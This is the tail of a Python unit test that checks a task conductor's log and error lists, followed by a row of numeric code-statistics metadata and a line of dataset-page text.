'task_id': 'task1'
}
]
self.assertListEqual(conductor.log, expected_log_entries)
self.assertListEqual(conductor.errors, expected_errors)
| 43.890625 | 100 | 0.655215 | 4,378 | 39,326 | 5.614893 | 0.055048 | 0.049142 | 0.049467 | 0.059881 | 0.891872 | 0.868806 | 0.843219 | 0.829509 | 0.815312 | 0.794565 | 0 | 0.010902 | 0.230306 | 39,326 | 895 | 101 | 43.939665 | 0.801216 | 0.030056 | 0 | 0.714693 | 0 | 0 | 0.084197 | 0 | 0 | 0 | 0 | 0 | 0.194009 | 1 | 0.057061 | false | 0 | 0.012839 | 0 | 0.072753 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.